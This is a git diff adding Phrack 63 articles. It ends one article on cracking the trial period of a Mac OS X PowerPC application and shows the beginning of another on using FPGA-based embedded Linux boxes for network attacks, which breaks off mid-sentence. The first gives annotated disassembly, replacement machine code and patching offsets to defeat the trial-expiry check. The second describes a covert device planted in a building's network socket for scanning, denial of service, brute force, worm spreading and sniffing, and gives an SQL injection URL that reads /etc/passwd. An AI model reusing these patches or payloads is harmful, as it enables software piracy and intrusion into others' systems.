+0x00051028 <-[StateController validState]+88>:  lwz     r4,2472(r4)
+
+	# As we did manage to load successfully, we fall through to
+	# here - load the message table and the string "retain".
+
+0x0005102c <-[StateController validState]+92>:  
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# firstLaunchDate = [ firstLaunchDate retain ];
+
+0x00051030 <-[StateController validState]+96>:  lwz     r3,40(r29)
+
+	# Here's where the divergent paths rejoin - load r3 with
+	# the SC:1.
+
+0x00051034 <-[StateController validState]+100>: cmpwi   cr7,r3,0
+0x00051038 <-[StateController validState]+104>: 
+	beq+    cr7,0x51070 <-[StateController validState]+160>
+
+	# Check to see if it's nil, and if so, jump out to +160.
+	# This would catch the case where we jumped from 0x51020 -
+	# would have seemed to make more sense to jump directly.
+
+0x0005103c <-[StateController validState]+108>: addis   r4,r31,4
+0x00051040 <-[StateController validState]+112>: lwz     r4,4976(r4)
+
+	# Load the message table and the string "timeIntervalSinceNow".
+
+0x00051044 <-[StateController validState]+116>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ firstLaunchDate timeIntervalSinceNow ];
+	#
+	# This message returns as an NSTimeInterval, which is a double.  
+	# As a result, the function returns to f1 instead of the usual
+	# r3.  The result in my case is:
+	# (gdb) print $f1
+	# $21 = -31790371.620961875
+	# (gdb) print $f1/60/60/24
+	# $22 = -367.944115983355
+	#
+	# This seems as expected from what we did at the beginning.
+
+0x00051048 <-[StateController validState]+120>: addis   r2,r31,3
+
+	# Not sure what's at r31 + 3 || 0x0000.  It's not the message 
+	# symbol table, and r2 is usually reserved for RTOC.
+
+0x0005104c <-[StateController validState]+124>: lfd     f0,26880(r2)
+
+	# Load double at r2 + 26880 into f0.  Perhaps r2 is a constants
+	# table.  It ends up being a big fat zero.
+
+0x00051050 <-[StateController validState]+128>: fcmpu   cr7,f1,f0
+0x00051054 <-[StateController validState]+132>: 
+	ble+    cr7,0x51070 <-[StateController validState]+160>
+
+	# Compare the time between first invocation and now with zero,
+	# if it's less ( and it should be, unless the first invocation
+	# was in the future! ) we jump to +160.
+
+0x00051058 <-[StateController validState]+136>: addis   r4,r31,4
+0x0005105c <-[StateController validState]+140>: lwz     r3,40(r29)
+0x00051060 <-[StateController validState]+144>: lwz     r4,1836(r4)
+0x00051064 <-[StateController validState]+148>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>     
+0x00051068 <-[StateController validState]+152>: li      r0,0
+0x0005106c <-[StateController validState]+156>: stw     r0,40(r29)
+0x00051070 <-[StateController validState]+160>: lwz     r0,40(r29) 
+
+	# Load our ever present SC:1 into r0.
+
+0x00051074 <-[StateController validState]+164>: addis   r2,r31,4
+0x00051078 <-[StateController validState]+168>: addis   r28,r31,4
+
+	# Load the message symbols into both r2 and r28.
+
+0x0005107c <-[StateController validState]+172>: lwz     r3,44(r29)
+
+	# Load another instance variable on the StateController - this
+	# one is 4 more along, at +44.  We'll tag it as SC:2.
+	#
+	# It turns out to be another NSDate, this one is 
+	# "2004-09-21 21:55:27 +1000", the time I started the current
+	# gdb session.
+
+0x00051080 <-[StateController validState]+176>: addis   r30,r31,4
+
+	# Load the message symbols into r30.
+
+0x00051084 <-[StateController validState]+180>: cmpwi   cr7,r0,0
+0x00051088 <-[StateController validState]+184>: 
+	bne-    cr7,0x510cc <-[StateController validState]+252>
+
+	# Compare SC:1 with 0, if it's not equal, jump to +252.
+	# Which we do.
+
+0x0005108c <-[StateController validState]+188>: lwz     r4,5172(r2)
+0x00051090 <-[StateController validState]+192>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>     
+0x00051094 <-[StateController validState]+196>: lwz     r4,1504(r30)
+0x00051098 <-[StateController validState]+200>: lwz     r3,5924(r28)
+0x0005109c <-[StateController validState]+204>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>     
+0x000510a0 <-[StateController validState]+208>: stw     r3,40(r29)
+0x000510a4 <-[StateController validState]+212>: addis   r4,r31,4
+0x000510a8 <-[StateController validState]+216>: lwz     r4,2472(r4)
+0x000510ac <-[StateController validState]+220>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>     
+0x000510b0 <-[StateController validState]+224>: lwz     r5,40(r29)
+0x000510b4 <-[StateController validState]+228>: mr      r3,r27
+0x000510b8 <-[StateController validState]+232>: addis   r4,r31,4
+0x000510bc <-[StateController validState]+236>: lwz     r4,5176(r4)
+0x000510c0 <-[StateController validState]+240>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>     
+0x000510c4 <-[StateController validState]+244>: li      r3,1
+0x000510c8 <-[StateController validState]+248>: 
+	b       0x51114 <-[StateController validState]+324>
+0x000510cc <-[StateController validState]+252>: lwz     r4,5172(r2) 
+
+	# Load r4 with r2 + 5172.  r2 still has the message symbol
+	# table from 0x51074.  The string is "timeIntervalSince1970".
+
+0x000510d0 <-[StateController validState]+256>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 still contains SC:2 from 0x5107c, the time this instance was
+	# launched.
+	#
+	# f1 = [ SC:2 timeIntervalSince1970 ];
+	# f1 = 1095767727.4292047
+	# f1/60/60/24/365 = 34.746566699302541
+
+0x000510d4 <-[StateController validState]+260>: lwz     r4,1504(r30)
+
+	# r30 still has the message symbol table.  r4 gets 
+	# "dateWithTimeIntervalSince1970:"
+
+0x000510d8 <-[StateController validState]+264>: lwz     r3,5924(r28)
+
+	# Last I saw of r28, it had the message symbol table in it
+	# as well, but +5924 seems to contain the NSDate class object.
+
+0x000510dc <-[StateController validState]+268>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ NSDate dateWithTimeIntervalSince1970: $f1 ]
+	# Since the first argument is a float, it will draw from f1 - 
+	# which still has the seconds since 1970 to current invocation 
+	# from 0x510d0.
+	# We end up with an exact copy of SC:2.  We'll call it 
+	# thisLaunchDate.
+
+0x000510e0 <-[StateController validState]+272>: addis   r4,r31,4
+
+	# Load the message symbol table into r4.
+
+0x000510e4 <-[StateController validState]+276>: mr      r29,r3
+
+	# Copy r3 to r29.
+
+0x000510e8 <-[StateController validState]+280>: mr      r3,r27
+
+	# Copy r27 to r3.  When last sighted at 0x51000, this
+	# held the prefs shared object.
+
+0x000510ec <-[StateController validState]+284>: lwz     r4,5168(r4)
+	
+	# Load string "firstLaunch" to r4.
+
+0x000510f0 <-[StateController validState]+288>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ prefObject firstLaunch ];
+	# As seen at 0x51014, the value returned from here was later
+	# stored in SC:1.
+
+0x000510f4 <-[StateController validState]+292>: addis   r4,r31,4
+
+	# Load the message symbol table to r4.
+
+0x000510f8 <-[StateController validState]+296>: mr      r5,r3
+
+	# Move the NSDate just returned from prefObject to 
+	# r5 ( second argument ).
+	
+0x000510fc <-[StateController validState]+300>: mr      r3,r29
+
+	# Copy r29 to r3 - r29 had the reconstituted NSDate 
+	# 'thisLaunchDate' from 0x510dc.
+
+0x00051100 <-[StateController validState]+304>: lwz     r4,3456(r4)
+
+	# Load "isEqualToDate:" into r4.
+
+0x00051104 <-[StateController validState]+308>: 
+	bl      0x739d0 <dyld_stub_objc_msgSend>
+
+	# r3 = [ thisLaunchDate isEqualToDate: firstLaunchDate ];
+	# That's going to be a big zero unless it's the first time
+	# you're running.
+
+0x00051108 <-[StateController validState]+312>: addic   r2,r3,-1
+
+	# r2 = r3 - 1 with carry flag.
+	# r2 will be set to max now.
+	# XER = 100B.
+
+0x0005110c <-[StateController validState]+316>: subfe   r0,r2,r3
+
+	# subfe r0, r2, r3 = !( r2 + r3 + XER[ carry bit ] )
+	#                  = !( max + 0 + 0 )
+	#                  = !( max )
+	#                  = 0
+
+0x00051110 <-[StateController validState]+320>: mr      r3,r0
+
+	# Move r0 to r3 - the function result.
+
+0x00051114 <-[StateController validState]+324>: lwz     r0,104(r1)
+0x00051118 <-[StateController validState]+328>: addi    r1,r1,96
+0x0005111c <-[StateController validState]+332>: lwz	r27,-20(r1)
+0x00051120 <-[StateController validState]+336>: mtlr    r0
+0x00051124 <-[StateController validState]+340>: blr
+
+	# Various housekeeping and then return.  For the most
+	# part, we reload those words we pushed into memory and
+	# the link register we stored in the opening moves.
+
+End of assembler dump.
+
+    Ok, in summary, it seems validState does something different to what
+it's name might indicate - it checks if it's the first time you've run 
+the program, initializes some data structures, etc.  If it returns one, 
+a dialog box asking you to join the company email list is displayed.
+
+    So it's not what we thought, but it's not a waste of time - we've 
+uncovered two useful pieces of information - the location of the date of 
+first invocation ( StateController + 40 ) and the location of the date of 
+current invocation ( StateController + 44 ).  These should all be set 
+correctly anytime after the first invocation of this function.  These
+two pieces of information are key to determining whether the software
+has expired or not.
+
+    We have a couple of options here.  Knowing the offset information of
+this data, we can attempt to find the code that checks to see if the
+trial is over, or we can attempt to intercept the initialization
+process and manipulate the data loading to ensure that the user is
+always within the trial window.  As this would be perfectly sufficient,
+we'll try that - a discussion of other avenues might make for interesting
+homework or a future article.
+
+--[ 4.0 - Solutions and Patching
+
+    A possible method will be to overwrite the contents of 
+StateController + 40 with StateController + 44 ( setting the
+date the program was first run to the current date ) and then return 
+zero, leaving alone the code that deals with the preferences api.  Due to
+the object oriented methodology of Cocoa development, the chances of
+some other function going crazy and performing a jump into the other parts
+of the function are slim to nil, and so we can leave it as is.
+
+ A Proposed replacement function:
+
+    Obtain a register for us to use.  Load the contents of StateController
++44 into it, write that register to StateController +40, release the
+register, zero r3, return.  The write is done like this as you cannot
+write directly to memory from memory in PPC assembler.
+
+ +-----
+ | stw		r31,	-20(r1)
+ | lwz		r31,	44(r3)
+ | stw		r31,	40(r3)
+ | lwz		r31,	-20(r1)
+ | xor		r3,	r3,	r3
+ | blr
+ +-----
+
+    Instead of consulting with the instruction reference to assemble it by
+hand, I'm going to be cheap and use GCC.  Paste the code into a file as
+follows:
+
+newfunc.s:
+
+-----
+.text                       
+  .globl _main
+_main:
+  stw          r31,    -20(r1)
+  lwz          r31,    44(r3)
+  stw          r31,    40(r3)
+  lwz          r31,    -20(r1)
+  xor          r3,     r3,     r3
+  blr
+-----
+
+ Compile it as follows: `gcc newfunc.s -o temp`, and load it into gdb:
+
+ | (gdb) x/15i main
+ | 0x1dec <main>:  stw     r31,-20(r1)
+ | 0x1df0 <main+4>:        lwz     r31,44(r3)
+ | 0x1df4 <main+8>:        stw     r31,40(r3)
+ | 0x1df8 <main+12>:       lwz     r31,-20(r1)
+ | 0x1dfc <main+16>:       xor     r3,r3,r3
+ | 0x1e00 <main+20>:       blr
+ | 0x1e04 <dyld_stub_exit>:        mflr    r0
+
+ We want to see the machine code for 24 instructions post <main>.
+
+ | (gdb) x/24xb main
+ | 0x1dec <main>:  
+ |	0x93    0xe1    0xff    0xec    0x83    0xe3    0x00    0x2c
+ | 0x1df4 <main+8>:        
+ |	0x93    0xe3    0x00    0x28    0x83    0xe1    0xff    0xec
+ | 0x1dfc <main+16>:       
+ |	0x7c    0x63    0x1a    0x78    0x4e    0x80    0x00    0x20
+
+    Now that we have our assembled bytecode, we need to paste it into
+our executable.  GDB is ( in theory ) capable of patching the file 
+directly, but it's a bit more complicated than it might appear (
+see Appendix B for details ).
+
+    The good news is, finding the correct offset for patching the file 
+itself is not difficult.  First, note the offset of the code you wish 
+to replace, as it appears in GDB. ( In this case, that's 0x50fd0. )  Now,
+do the following:
+
+ | (gdb) info sym 0x50fd0
+ | [StateController validState] in section LC_SEGMENT.__TEXT.__text
+ |     of <executable name>
+
+    Armed with this knowledge of what segment the code falls in
+( __TEXT.__text ), we can proceed.  Run "otool -l" on your binary,
+and search for something like this ( taken from a different executable,
+unfortunately ):
+
+ | Section
+ |   sectname __text
+ |    segname __TEXT
+ |       addr 0x0000236c
+ |       size 0x000009a8
+ |     offset 4972
+ |      align 2^2 (4)
+ |     reloff 0
+ |     nreloc 0
+ |      flags 0x80000400
+ |  reserved1 0
+ |  reserved2 0
+
+    The offset to your code in the file is equal to the address of the
+code in memory, minus the "addr" entry, plus the "offset" entry.  Keep
+in mind that "addr" is in hex and offset is not!  Now you can just
+over-write the code as appropriate in your hex editor.
+
+ Save and then try and run the program.  It worked for me first time!
+
+--[ A - GDB, OSX, PPC & Cocoa - Some Observations.
+
+ Calling Convention:
+    When handling calls, registers 0, 1 and 2 store important housekeeping
+information.  They are not to be fucked with unless you carefully restore
+their values post haste.  Arguments to functions commence at r3, and
+return values are stored at r3 as well.  Except for stuff like floats,
+which you might find coming back in f1, etc.
+
+    One of the things that makes OSX applications such a joy to crack is 
+the heavy reliance on neatly defined object oriented interfaces, and the
+corresponding heavy use of messaging.  Often in disassemblies you will
+come across branches to <dyld_stub_objc_msgSend>.  This is a reformulation
+of the typical calling convention:
+
+ | [ anObject aMessage: anArgument andA: notherArgument ];
+
+ Into something like this:
+
+ | objc_msgSend( anObject, "aMessage:andA:", anArgument, notherArgument );
+
+    Hence, the receiving object will occupy r3, the selector will be a 
+plain string at r4, and subsequent arguments will occupy r5 onwards.  As 
+r4 will contain a string, interrogate it with "x/s $r4", as the receiver 
+will be an object, "po $r3", and for the types of subsequent arguments, I 
+recommend you consult the xcode documentation where available.  "po" is 
+shorthand for invoking the description methods on the receiving object.   
+
+ GDB Integration:
+    Due to the excellent Objective C support in GDB, not only can we 
+breakpoint functions using their [] message nomenclature, but also 
+perform direct invocations of methods as such: if r5 contained a pointer 
+to an NSString object, the following is quite reasonable:
+
+ | (gdb) print ( char * ) [ $r5 cString ]
+ | $3 = 0x833c8 " \t\r\n"
+
+    Very useful.  Don't forget that it's available if you want to test
+how certain functions react to certain inputs.
+
+-- [ B - Why can't we just patch with GDB?
+
+ As some of you probably know, GDB can, in principle, write changes
+out to core and executable files.  This is not really practical in
+the scenario we're dealing with here, and I'll explain why.
+
+ First, Mach-O binaries have memory protection.  If you're going to
+overwrite parts of the __TEXT.__text segment, you're going to have
+to reset it's permissions.  Christian Klein has written a program to
+do this ( see <http://blogs.23.nu/c0re/stories/7873/>. )  You can
+also, once the program is running and has an execution space, do
+things like:
+
+ | (gdb) print (int)mprotect( <address>, <length>, 0x1|0x2|0x4 )
+
+ However, even when this is done, this only lets you write to the
+process in memory.  To actually make changes to the disk copy, you
+need to either invoke GDB as 'gdb --write', or execute:
+
+ | (gdb) set write on
+ | (gdb) exec-file <filename>
+
+ The problem is, OSX uses demand paging for executables.
+
+ What this means is that the entire program isn't loaded into memory
+straight away - it's lifted off disk as needed.  As a result, you're
+not allowed to execute a file which is open for writing.
+
+ The upshot is, if you try and do it, as soon as you run the program
+in the debugger, it crashes out with "Text file is busy".
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack63/17.txt b/phrack63/17.txt
new file mode 100644
index 0000000..8f01424
--- /dev/null
+++ b/phrack63/17.txt
@@ -0,0 +1,817 @@
+                           ==Phrack Inc.==
+
+                Volume 0x0b, Issue 0x3f, Phile #0x11 of 0x14
+
+|=------------[ Security Review Of Embedded Systems And Its ]------------=|
+|=------------[     Applications To Hacking Methodology     ]------------=|
+|=-----------------------------------------------------------------------=|
+|=----[ Cawan: <chuiyewleong[at]hotmail.com> or <cawan[at]ieee.org> ]----=|
+
+
+--=[ Contents
+
+    1. - Introduction
+
+    2. - Architectures Classification
+
+    3. - Hacking with Embedded System
+
+    4. - Hacking with Embedded Linux
+
+    5. - "Hacking Machine" Implementation In FPGA
+
+    6. - What The Advantages Of Using FPGA In Hacking ?
+
+    7. - What Else Of Magic That Embedded Linux Can Do ?
+
+    8. - Conclusion
+
+
+--[ 1. - Introduction
+
+    Embedded systems have been penetrated the daily human life. In 
+residential home, the deployment of "smart" systems have brought out the 
+term of "smart-home". It is dealing with the home security, electronic 
+appliances control and monitoring, audio/video based entertainment, home 
+networking, and etc. In building automation, embedded system provides the 
+ability of network enabled (Lonwork, Bacnet or X10) for extra convenient 
+control and monitoring purposes. For intra-building communication, the 
+physical network media including power-line, RS485, optical fiber, RJ45, 
+IrDA, RF, and etc. In this case, media gateway is playing the roll to 
+provide inter-media interfacing for the system. For personal handheld 
+systems, mobile devices such as handphone/smartphone and PDA/XDA are going 
+to be the necessity in human life. However, the growing of 3G is not as 
+good as what is planning initially. The slow adoption in 3G is because it 
+is lacking of direct compatibility to TCP/IP. As a result, 4G with Wimax 
+technology is more likely to look forward by communication industry 
+regarding to its wireless broadband with OFDM. 
+
+    Obviously, the development trend of embedded systems application is 
+going to be convergence - by applying TCP/IP as "protocol glue" for 
+inter-media interfacing purpose. Since the deployment of IPv6 will cause 
+an unreasonable overshooting cost, so the widespread of IPv6 products 
+still needs some extra times to be negotiated. 
+As a result, IPv4 will continue to dominate the world of networking, 
+especially in embedded applications. As what we know, the brand-old 
+IPv4 is being challenged by its native security problems in terms of 
+confidentiality, integrity, and authentication.
+Extra value added modules such as SSL and SSH would be the best solution 
+to protect most of the attacks such as Denial of Service, hijacking, 
+spooling, sniffing, and etc. However, the implementation of such value 
+added module in embedded system is optional because it is lacking of 
+available hardware resources. For example, it is not reasonable to 
+implement SSL in SitePlayer[1] for a complicated web-based control and 
+monitoring system by considering the available flash and memory that 
+can be utilized. 
+
+    By the time of IPv4 is going to conquer the embedded system's world, 
+the native characteristic of IPv4 and the reduced structure of embedded 
+system would be problems in security consideration. 
+These would probably a hidden timer-bomb that is waiting to be exploited. 
+As an example, by simply performing port scan with pattern recognition to 
+a range of IP address, any of the running SC12 IPC@CHIP[2] can be 
+identified and exposed. Once the IP address of a running SC12 is confirmed, 
+by applying a sequence of five ping packet with the length of 65500 is 
+sufficient to crash it until reset. 
+
+
+--[ 2. - Architectures Classification
+
+    With the advent of commodity electronics in the 1980s, digital utility
+began to proliferate beyond the world of technology and industry. By its 
+nature digital signal can be represented exactly and easily, which gives 
+it much more utility. In term of digital system design, programmable 
+logic has a primary advantage over custom gate arrays and standard cells 
+by enabling faster time-to-complete and shorter design cycles. By using 
+software, digital design can be programmed directly into programmable 
+logic and allowing making revisions to the design relatively quickly.
+The two major types of programmable logic devices are Field Programmable 
+Logic Arrays (FPGAs) and Complex Programmable Logic Devices (CPLDs). 
+FPGAs offer the highest amount of logic density, the most features, 
+and the highest performance. These advanced devices also offer features 
+such as built-in hardwired processors (such as the IBM Power PC), 
+substantial amounts of memory, clock management systems, and support 
+for many of the latest very fast device-to-device signaling technologies.
+FPGAs are used in a wide variety of applications ranging from data 
+processing and storage, instrumentation, telecommunications, and digital 
+signal processing. Instead, CPLDs offer much smaller amounts of logic
+(approximately 10,000 gates). But CPLDs offer very predictable timing 
+characteristics and are therefore ideal for critical control applications.
+Besides, CPLDs also require extremely low amounts of power and are very 
+inexpensive. 
+
+    Well, it is the time to discuss about Hardware Description Language 
+(HDL). HDL is a software programming language used to model the intended 
+operation of a piece of hardware. There are two aspects to the description 
+of hardware that an HDL facilitates: true abstract behavior modeling and 
+hardware structure modeling. The behavior of hardware may be modeled and 
+represented at various levels of abstraction during the design process. 
+Higher level models describe the operation of hardware abstractly, while 
+lower level models include more detail, such as inferred hardware 
+structure. There are two types of HDL: VHDL and Verilog-HDL. The history 
+of VHDL started from 1980 when the USA Department of Defence (DoD) wanted 
+to make circuit design self documenting, follow a common design methodology 
+and be reusable with new technologies. It became clear there was a need for 
+a standard programming language for describing the function and structure 
+of digital circuits for the design of integrated circuits (ICs). The DoD 
+funded a project under the Very High Speed Integrated Circuit (VHSIC) 
+program to create a standard hardware description language. 
+The result was the creation of the VHSIC hardware description language or 
+VHDL as it is now commonly known. The history of Verilog-HDL started from 
+1981, when a CAE software company called Gateway Design Automation that was 
+founded by Prabhu Goel. One of the Gateway's first employees was Phil 
+Moorby, who was an original author of GenRad's Hardware Description 
+Language (GHDL) and HILO simulator. On 1983, Gateway released the Verilog 
+Hardware Description Language known as Verilog-HDL or simply Verilog
+together with a Verilog simulator. Both VHDL and Verilog-HDL are reviewed 
+and adopted by IEEE as IEEE standard 1076 and 1364, respectively.
+                 
+    Modern hardware implementation of embedded systems can be classified 
+into two categories: hardcore processing and softcore processing. Hardcore
+processing is a method of applying hard processor(s) such as ARM, MIPS,
+x86, and etc as processing unit with integrated protocol stack. 
+For example, SC12 with x86, IP2022 with Scenix RISC, eZ80, SitePlayer 
+and Rabbit are dropped in the category of hardcore processing.Instead,
+softcore processing is applying a synthesizable core that can be targeted
+into different semiconductor fabrics. The semiconductor fabrics should be
+programmable as what FPGA and CPLD do. Altera[3] and Xilinx[4] are the
+only FPGA/CPLD manufacturers in the market that supporting softcore 
+processor. Altera provides NIOS processor that can be implemented in SOPC 
+Builder that is targeted to its Cyclone and Stratix FPGAs. Xilinx provides 
+two types of softcore: Picoblaze, that is targeted to its CoolRunner-2 
+CPLD; and Microblaze, that is targeted to its Spartan and Virtex FPGAs.  
+For the case of FPGAs with embedded hardcore, for example ARM-core in 
+Stratix, and MIPS-core in Virtex are classified as embedded hardcore 
+processing. On the other hand, FPGAs with embedded softcore such as 
+NIOS-core in Cyclone or Stratix, and Microblaze-core in Spartan or Virtex 
+are classified as softcore processing. Besides, the embedded softcore can 
+be associated with others synthesizable peripherals such as DMA controller 
+for advanced processing purpose. 
+
+    In general, the classical point of view regarding to the hardcore 
+processing might assuming it is always running faster than softcore 
+processing. However, it is not the fact. Processor performance is often 
+limited by how fast the instruction and data can be pipelined from external
+memory into execution unit. As a result, hardcore processing is more 
+suitable for general application purpose but softcore processing is more 
+liable to be used in customized application purpose with parallel 
+processing and DSP. It is targeted to flexible implementation in adaptive 
+platform.
+
+
+--[ 3. - Hacking with Embedded System
+
+    When the advantages of softcore processing are applied in hacking, it 
+brings out more creative methods of attack, the only limitation is the 
+imagination. Richard Clayton had shown the method of extracting a 3DES key 
+from an IBM 4758 that is running Common Cryptographic Architecture 
+(CCA)[5]. The IBM 4758 with its CCA software is widely used in the banking 
+industry to hold encryption keys securely. The device is extremely 
+tamper-resistant and no physical attack is known that will allow keys to be 
+accessed. According to Richard, about 20 minutes of uninterrupted access to 
+the IBM 4758 with Combine_Key_Parts permission is sufficient to export the 
+DES and 3DES keys. For convenience purpose, it is more likely to implement 
+an embedded system with customized application to get the keys within the 
+20 minutes of accessing to the device. An evaluation board from Altera was 
+selected by Richard Clayton for the purpose of keys exporting and 
+additional two days of offline key cracking.
+
+    In practice, by using multiple NIOS-core with customized peripherals 
+would provide better performance in offline key cracking. In fact, 
+customized parallel processing is very suitable to exploit both symmetrical 
+and asymmetrical encrypted keys.   
+      
+
+--[ 4. - Hacking with Embedded Linux
+
+    For application based hacking, such as buffer overflow and SQL 
+injection, it is more preferred to have RTOS installed in the embedded 
+system. For code reusability purpose, embedded linux would be the best 
+choice of embedded hacking platform. The following examples have clearly 
+shown the possible attacks under an embedded platform. The condition of 
+the embedded platform is come with a Nios-core in Stratix and  uClinux 
+being installed. By recompiling the source code of netcat and make it run 
+in uClinux, a swiss army knife is created and ready to perform penetration 
+as listed below: -
+
+    a) Port Scan With Pattern Recognition 
+ 
+        A list of subnet can be defined initially in the embedded system 
+    and bring it into a commercial building. Plug the embedded system 
+    into any RJ45 socket in the building, press a button to perform port 
+    scan with pattern recognition and identify any vulnerable network 
+    embedded system in the building. Press another button to launch attack 
+    (Denial of Service) to the target network embedded system(s). This 
+    is a serious problem when the target network embedded system(s) is/are 
+    related to the building evacuation system, surveillance system or 
+    security system.
+    
+     b) Automatic Brute-Force Attack
+    
+        Defines server(s) address, dictionary, and brute-force pattern 
+    in the embedded system. Again, plug the embedded system into any RJ45
+    socket in the building, press a button to start the password guessing 
+    process. While this small box of embedded system is located in a hidden
+    corner of any RJ45 socket, it can perform the task of cracking over 
+    days, powered by battery.
+    
+    c) LAN Hacking
+ 
+        By pre-identify the server(s) address, version of patch, type 
+    of service(s), a structured attack can be launched within the area 
+    of the building. For example, by defining:
+    
+        http://192.168.1.1/show.php?id=1%20and%201=2%20union%20select%20
+        8,7,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),5,4,
+        3,2,1
+   
+        **char(47,101,116,99,47,112,97,115,115,119,100) = /etc/passwd
+    
+    in the embedded system initially. Again, plug the embedded system into
+    any RJ45 socket in the building (within the LAN), press a button to
+    start SQL injection attack to grab the password file of the Unix
+    machine (in the LAN). The password file is then store in the flash 
+    memory and ready to be loaded out for offline cracking. Instead of 
+    performing SQL injection, exploits can be used for the same 
+    purpose.
+    
+    d) Virus/Worm Spreading
+ 
+        The virus/worm can be pre-loaded in the embedded system. Again, 
+    plug the embedded system into any RJ45 socket in the building, press a 
+    button to run an exploit to any vulnerable target machine, and load the
+    virus/worm into the LAN.
+    
+    e) Embedded Sniffer
+ 
+        Switch the network interface from normal mode into promiscuous mode 
+    and define the sniffing conditions. Again, plug the embedded system 
+    into any RJ45 socket in the building, press a button to start the 
+    sniffer. To make sure the sniffing process can be proceed in switch 
+    LAN, ARP sniffer is recommended for this purpose. 
+    
+
+--[ 5. - "Hacking Machine" Implementation In FPGA
+
+    The implementation of embedded "hacking machine" will be demonstrated 
+in Altera's NIOS development board with Stratix EP1S10 FPGA. The board 
+provides a 10/100-base-T ethernet and a compact-flash connector. Two
+RS-232 ports are also provided for serial interfacing and system 
+configuration purposes, respectively. Besides, the onboard 1MB of SRAM, 
+16MB of SDRAM, and 8MB of flash memory are ready for embedded linux 
+installation[6]. The version of embedded linux that is going to be applied 
+is uClinux from microtronix[7]. 
+
+    Ok, that is the specification of the board. Now, we start our journey 
+of "hacking machine" design. We use three tools provided by Altera to 
+implement our "hardware" design. In this case, the term of "hardware" means
+it is synthesizable and to be designed in Verilog-HDL. The three tools 
+being used are: QuartusII ( as synthesis tool), SOPC Builder (as 
+Nios-core design tool), and C compiler. Others synthesis tools such as 
+leonardo-spectrum from mentor graphic, and synplify from synplicity are 
+optional to be used for special purpose. In this case, the synthesized 
+design in edif format is defined as external module. It is needed to import
+the module from QuartusII to perform place-and-route (PAR). The outcome of 
+PAR is defined as hardware-core. For advanced user, Modelsim from mentor 
+graphic is highly recommended to perform behavioral simulation and Post-PAR
+simulation. Behavioral simulation is a type of functional verification to 
+the digital hardware design. Timing issues are not put into the 
+consideration in this state. Instead, Post-PAR simulation is a type of 
+real-case verification. In this state, all the real-case factors such as 
+power-consumption and timing conditions (in sdf format) are put into the 
+consideration. [8,9,10,11,12]
+
+    A reference design is provided by microtronix and it is highly 
+recommended to be the design framework for any others custom design with
+appropriate modifications [13]. Well, for our "hacking machine" design
+purpose, the only modification that we need to do is to assign the 
+interrupts of four onboard push-buttons [14]. So, once the design 
+framework is loaded into QuartusII, SOPC Builder is ready to start 
+the design of Nios-core, Boot-ROM, SRAM and SDRAM inteface, Ethernet 
+interface, compact-flash interface and so on. Before starting to generate 
+synthesizable codes from the design, it is crucial to ensure the check-box 
+of "Microtronix uClinux" under Software Components is selected (it is in 
+the "More CPU Settings" tab of the main configuration windows in SOPC 
+Builder). By selecting this option, it is enabling to build a uClinux 
+kernel, uClibc library, and some uClinux's general purpose applications by 
+the time of generating synthesizable codes. Once ready, generate the design 
+as synthesizable codes in SOPC Builder following by performing PAR in 
+QuartusII to get a hardware core. In general, there are two formats of 
+hardware core:- 
+
+    a) .sof core:  To be downloaded into the EP1S10 directly by JTAG and 
+                   will require a re-load if the board is power cycled
+                   **(Think as volatile)
+             
+    b) .pof core:  To be downloaded into EPC16 (enhanced configuration
+                   device) and will automatically be loaded into the 
+                   FPGA every time the board is power cycled
+                   **(Think as non-volatile)
+                 
+    The raw format of .sof and .pof hardware core is .hexout. As hacker, 
+we would prefer to work in command line, so we use the hexout2flash tool 
+to convert the hardware core from .hexout into .flash and relocate the 
+base address of the core to 0x600000 in flash. The 0x600000 is the startup 
+core loading address of EP1S10. So, once the .flash file is created, we 
+use nios-run or nr command to download the hardware core into flash memory 
+as following:
+
+    [Linux Developer] ...uClinux/: nios-run hackcore.hexout.flash
+
+    After nios-run indicates that the download has completed successfully, 
+restart the board. The downloaded core will now start as the default core 
+whenever the board is restarted.
+
+    Fine, the "hardware" part is completed. Now, we look into the 
+"software" implementation. We start from uClinux. As what is stated, the 
+SOPC Builder had generated a framework of uClinux kernel, uClibc library, 
+and some uClinux general purpose applications such as cat, mv, rm, and etc.
+
+We start to reconfigure the kernel by using "make xconfig". 
+
+    [Linux Developer] ...uClinux/: cd linux
+    [Linux Developer] ...uClinux/: make xconfig
+
+In xconfig, perform appropriate tuning to the kernel, then use 
+"make clean" to clean the source tree of any object files.
+
+    [Linux Developer] ...linux/: make clean 
+
+To start building a new kernel use "make dep" following by "make". 
+
+    [Linux Developer] ...linux/: make dep
+    [Linux Developer] ...linux/: make
+
+To build the linux.flash file for uploading, use "make linux.flash". 
+
+    [Linux Developer] ...uClinux/: make linux.flash
+
+The linux.flash file is defined as the operating system image. 
+As what we know, an operating system must run with a file system.
+So, we need to create a file system image too. First, edit the config
+file in userland/.config to select which application packages get 
+built. For example:
+
+    #TITLE agetty
+    CONFIG_AGETTY=y
+
+If an application package's corresponding variable is set to 'n' 
+(for example, CONFIG_AGETTY=n), then it will not be built and copied
+over to the target/ directory. Then, build all application packages 
+specified in the userland/.config as following:
+
+    [Linux Developer] ...userland/: make
+
+Now, we copy the pre-compiled netcat into target/ directory. 
+After that, use "make romfs" to start generating the file system or 
+romdisk image. 
+
+    [Linux Developer] ...uClinux/: make romfs
+
+Once completed, the resulting romdisk.flash file is ready to be 
+downloaded
+to the target board. First, download the file system image following by
+the operating system image into the flash memory.  
+
+    [Linux Developer] ...uClinux/: nios-run -x romdisk.flash
+    [Linux Developer] ...uClinux/: nios-run linux.flash
+
+Well, our FPGA-based "hacking machine" is ready now. 
+ 
+    Lets try to make use of it to a linux machine with /etc/passwd 
+enabled. We assume the ip of the target linux machine is 192.168.1.1 
+as web server in the LAN that utilize MySQL database. Besides, we know 
+that its show.php is vulnerable to be SQL injected. We also assume it has 
